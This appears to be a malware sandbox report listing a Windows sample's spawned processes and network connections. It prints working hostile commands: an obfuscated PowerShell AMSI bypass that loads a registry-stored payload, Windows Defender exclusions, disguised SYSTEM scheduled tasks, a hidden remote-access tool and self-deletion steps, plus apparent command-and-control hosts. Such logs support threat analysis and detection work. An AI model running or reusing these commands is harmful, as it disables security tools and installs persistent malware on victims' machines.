"C:\Windows\system32\lsass.exe"

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im conhost.exe

C:\Users\Admin\AppData\Local\Temp\a\info.exe

"C:\Users\Admin\AppData\Local\Temp\a\info.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Windows\SysWOW64\ruts\11.reg

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c delete.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Users\Admin\AppData\Local\Temp\a\50.exe

"C:\Users\Admin\AppData\Local\Temp\a\50.exe"

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VtjvVificAJN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kusngmbREwjGSW,[Parameter(Position=1)][Type]$XKFbtELJBS)$NuEpGtSOYnb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+'t'+''+'e'+''+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+'o'+''+[Char](67)+'la'+[Char](115)+'s',[MulticastDelegate]);$NuEpGtSOYnb.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$kusngmbREwjGSW).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$NuEpGtSOYnb.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$XKFbtELJBS,$kusngmbREwjGSW).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $NuEpGtSOYnb.CreateType();}$QUUJzFBntxEji=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+'dl'+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+'r'+'osof'+'t'+'.W'+'i'+'n32'+'.'+''+'U'+'ns'+[Char](97)+'feNa'+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$poHHlZzMgJrisA=$QUUJzFBntxEji.GetMethod('G'+'e'+''+'t'+''+[Char](80)+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ddbBMYDeVLMDspmiqfV=VtjvVificAJN @([String])([IntPtr]);$zNuQqnyONNTRQeuOxEpjTL=VtjvVificAJN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SwUOmIepTyu=$QUUJzFBntxEji.GetMethod(''+'G'+'et'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$ksSzcCsHSskmhO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'ra'+[Char](114)+''+[Char](121)+''+'A'+'')));$XCULVGkXQfUkHqulO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$yIAjRrv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ksSzcCsHSskmhO,$ddbBMYDeVLMDspmiqfV).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$lkSFLrDnoeSGJBDey=$poHHlZzMgJrisA.Invoke($Null,@([Object]$yIAjRrv,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$nAxVBtUsVE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,4,[ref]$nAxVBtUsVE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lkSFLrDnoeSGJBDey,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,0x20,[ref]$nAxVBtUsVE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+'R'+'E').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+'s'+[Char](115)+''+[Char](116)+''+'a'+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Users\Admin\AppData\Local\Temp\a\qwex.exe

"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Users\Admin\AppData\Local\Temp\a\XW.exe

"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 440 -p 5732 -ip 5732

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5732 -s 1512

C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"

C:\Users\Admin\AppData\Local\Temp\a\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"

C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe

"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"

C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe

"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 528 -p 1652 -ip 1652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5608 -ip 5608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 884

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1652 -s 2132

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Users\Admin\AppData\Local\Temp\rascqn.exe

"C:\Users\Admin\AppData\Local\Temp\rascqn.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4532 -ip 4532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5340 -ip 5340

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 564 -p 6548 -ip 6548

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 6548 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 1308

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5292 -ip 5292

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6212 -ip 6212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 76

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 616 -p 7936 -ip 7936

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 7936 -s 668

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.134.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 234.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
FR 194.59.30.220:1336 tcp
US 8.8.8.8:53 220.30.59.194.in-addr.arpa udp
RU 31.41.244.10:80 31.41.244.10 tcp
US 8.8.8.8:53 10.244.41.31.in-addr.arpa udp
RU 31.41.244.12:80 31.41.244.12 tcp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.75.238:443 drive.google.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
FR 142.250.179.67:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.105:80 r11.o.lencr.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 96.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 105.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 23.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
RU 31.41.244.9:80 31.41.244.9 tcp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 grahm.xyz udp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 31.10.203.116.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 2.18.190.73:80 e5.o.lencr.org tcp
US 66.45.226.53:7777 66.45.226.53 tcp
RU 178.215.75.170:2525 tcp
RU 89.169.17.238:445 tcp
RU 89.169.0.159:554 tcp
RU 178.215.66.130:179 tcp
RU 83.217.197.147:80 tcp
RU 83.217.192.194:8080 tcp
RU 83.217.197.147:143 tcp
RU 89.169.1.216:2000 tcp
RU 178.215.75.170:443 tcp
RU 83.217.197.125:1723 tcp
RU 89.169.1.97:80 tcp
RU 178.215.65.231:23 tcp
RU 83.217.197.147:143 tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 53.226.45.66.in-addr.arpa udp
US 8.8.8.8:53 170.75.215.178.in-addr.arpa udp
US 8.8.8.8:53 147.197.217.83.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 104.21.45.165:443 infect-crackle.cyou tcp
US 8.8.8.8:53 165.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 194.192.217.83.in-addr.arpa udp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 fightlsoser.click udp
US 172.67.213.48:443 fightlsoser.click tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 48.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 218.172.154.94.in-addr.arpa udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 api.telegram.org udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.99:443 t.me tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
N/A 127.0.0.1:8080 tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.75.238:443 drive.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
N/A 127.0.0.1:8080 tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 104.21.79.7:443 drive-connect.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 7.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 209.131.35.89.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8080 tcp
US 8.8.8.8:53 a1060630.xsph.ru udp
RU 141.8.192.138:80 a1060630.xsph.ru tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
FR 142.250.75.238:443 drive.google.com tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
N/A 127.0.0.1:8080 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
